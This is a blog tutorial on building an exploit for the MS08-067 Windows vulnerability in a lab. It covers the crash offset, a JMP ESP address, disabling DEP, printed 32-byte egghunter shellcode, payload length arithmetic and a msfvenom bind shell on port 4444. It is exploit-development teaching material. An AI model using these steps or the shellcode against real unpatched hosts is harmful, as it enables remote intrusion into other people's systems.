MS08-067 Exploit Development

A guide to writing an exploit for the famous MS08-067 vulnerability

Fahri Shihab
5 min read · Sep 13, 2020

Alright, straight to the point and no chit chat!

The Setup Environment 🛣

Vulnerable Machine

Attacking Machine

Attach svchost

First of all, make sure the POC script works! Open Immunity Debugger and attach to svchost. Check my screenshot to make sure you attach to the right service.

Overwriting EIP Register

After running the script, you should have the same crash as the screenshot. Note that EIP is overwritten with 41414141.

With all that, it means you have all the requirements needed to proceed 🤘

Finding the Offset 🏢

Snippet From Original POC

I like to use msf-pattern-create from Kali and just put in a pattern of length 74 (because the POC has 74 A's).

msf-pattern-create

So this is what the exploit code should look like.

POC with msf-pattern

Take note of the value of EIP after running that: 41366141.

Pattern found at EIP Register

Then find the offset using the following command

Pattern Offset

Great, the offset is at 18.

Now modify the exploit script a little to verify if the offset is correct.

Adjusted POC

Looking good 😎
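To check the offset step without the Metasploit tools, here is an added example (my own code, not the author's script) that rebuilds the msf-pattern-create / pattern_offset logic and maps the EIP value 41366141 seen in the debugger back to offset 18 in the 74-byte buffer. The function names are mine; the pattern alphabet (Aa0Aa1 ... Az9Ba0 ...) is the standard Metasploit one.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1Aa2 ... Az9Ba0 ..., cut to `length` bytes.
    Every 4-byte window is unique, which is what makes the crash value searchable."""
    out = bytearray()
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the 20280-byte pattern space")


def pattern_offset(register_value, length):
    """Map a 32-bit register value from the debugger (hex string such as '41366141',
    or an int) back to its offset in the pattern of the given length.
    Little-endian is tried first (the x86 stack byte order), then the reversed
    order, mirroring what msf-pattern_offset does. Returns None if not present."""
    value = int(register_value, 16) if isinstance(register_value, str) else register_value
    pattern = pattern_create(length)
    for fmt in ("<I", ">I"):
        idx = pattern.find(struct.pack(fmt, value))
        if idx != -1:
            return idx
    return None


def bytes_after_eip(length, offset, eip_width=4):
    """Bytes of the crash buffer that land after the overwritten return address,
    i.e. the space ESP points at once the function returns (74 - 18 - 4 = 52 here)."""
    return length - offset - eip_width


if __name__ == "__main__":
    # Values from this write-up: a 74-byte pattern and EIP = 41366141 at the crash.
    print(pattern_offset("41366141", 74))   # offset of the four bytes that hit EIP
    print(bytes_after_eip(74, 18))          # remaining buffer available at ESP
```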

Controlling EIP 🕹

Unfortunately, none of the registers that point into our buffer has enough space for a shellcode big enough to give us a shell. It looks like the ESP register points at the remainder of our buffer (74 - 18 - 4 = 52 bytes), which is enough space to store our little egghunter payload of 32 bytes.

So now find a JMP ESP instruction to replace EIP with. I used the one from ntdll.dll:

7C941EED   FFE4   JMP ESP ==> This will be our EIP replacement

Re-attach the service in Immunity Debugger and set a breakpoint at address 7C941EED (JMP ESP). If everything goes smoothly, the breakpoint should be hit and you will be redirected to the beginning of your 'C' payload.

Breakpoint hit

Stepping into (F7) brings us to the 'C' buffer. Success! Continue.

The Obstacle🧗🏼‍♀️

Further along, some of you will get an access violation error. This is because of Data Execution Prevention (DEP) that Microsoft has implemented starting with Windows XP Service Pack 2 and Windows Server 2003. You can refer to the official documentation here. But for now, you can disable DEP by following the steps from this site. We will discuss DEP in the very next blog post. Stay tuned 😇

The Egghunter 🥚🎭

Generate an egghunter shellcode with the egg w00t:

C:\Documents and Settings\Owner\Desktop>egghunter.exe cstyle 0x77303074
// 32 byte egghunt shellcode (egg=0x77303074)
unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x74\x30\x30\x77\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";

Since we know that ESP will contain our buffer, we can place our 32 byte egghunter shellcode there.

Also, change the buffer content to the egg so the egghunter has something to find. \xCC is the INT3 instruction, i.e. a software breakpoint, so execution will pause when it reaches the \xCC bytes, which also tells us that our egghunter has found the egg.

Here is what it should look like if you got everything working correctly. Notice that the instruction at EIP is the \xCC we wrote into the buffer.

The Final Payload 💀

Generate a bind shell payload using msfvenom.

msfvenom windows x86 bindshell payload

The MaxCount and ActualCount fields (linked to the line number in the script) in the exploit have to be adjusted so we can increase the size of our payload; they count 2-byte Unicode characters rather than bytes, which is why the total below is divided by two. The ServerUNC buffer content is where our buffer of \xCC bytes is.

This is what it's going to look like:

The calculation is as follows:

stub += 't00wt00w' + '\x90'*16 + buf
--------------
MaxCount = ActualCount = (8 + 16 + 336 + 4) / 2 = 182 = \xB6

This is the final payload

When you run it, observe that the command prompt on the left (before) does not have port 4444 listening, while the command prompt on the right (after) has port 4444 listening.

That's it! 🤘

If you followed through, you have successfully written an exploit for MS08-067. Let me know how it goes for you; if you have any questions, please drop them in the comment section. Rock on!
